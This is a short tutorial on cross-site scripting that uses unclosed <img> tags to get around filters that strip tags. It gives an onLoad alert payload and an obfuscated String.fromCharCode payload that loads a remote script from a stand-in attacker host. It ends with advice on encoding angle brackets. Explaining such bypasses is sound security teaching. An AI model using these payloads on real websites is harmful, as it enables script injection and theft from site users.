Cross-Site Scripting with Broken IMG Tags
Cross-site scripting (XSS) is the injection of script code into the results returned by a vulnerable website. This type of vulnerability allows an attacker to run malicious scripting in the context of a trusted site, bad things ensue. Any web application that stores or reflects a value that can be manipulated by users must sanitized to prevent XSS vulnerabilities.
A common XSS sanitation solution is to remove all tags in the submitted value. Often, the routines used to remove tags does not properly handle broken tags - tags that do not have a closing angle bracket. Modern web browsers are designed to gracefully handle poorly implemented HTML and can be tricked into running script called from a broken tag.
My favorite tool for the broken tag attack is <img>. If I discover a reflected value that will allow me to inject a < into the results, I know I've got a shot at getting the broken tag to work. In its simplest form, the broken tag injection looks like:
<img src='/image.png' onLoad='alert("xss");'
Even without the closing > the tag will be processed and the onLoad function called. The alert could be replaced with a document.write to include additional code from a remote source. Since we're attempting to bypass a character filter, any injected code must avoid the closing angle bracket that would trigger the defenses. One way to do this is to use the injected image tag to unpack some obfuscated code:
<img src='/image.png' onLoad='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115, 114,99,61,39,104,116,116,112,58,47,47,97,116,116,97,99,107,114,46,110,101,116, 47,120,115, 115,46,106,115,39,62,60,47,115,99,114,105,112,116,62)'
When the injected code above is run, the array of character codes will be interpreted and written to the page as:
<script src='http://attakr.net/xss.js'></script>
In addition to eliminating HTML tags, it can be beneficial to convert all user submitted angle brackets to the < and > HTML entities. This has the direct effect of stopping any broken HTML tags. This does not address injection directly into scripting code that other vulnerabilities might permit.
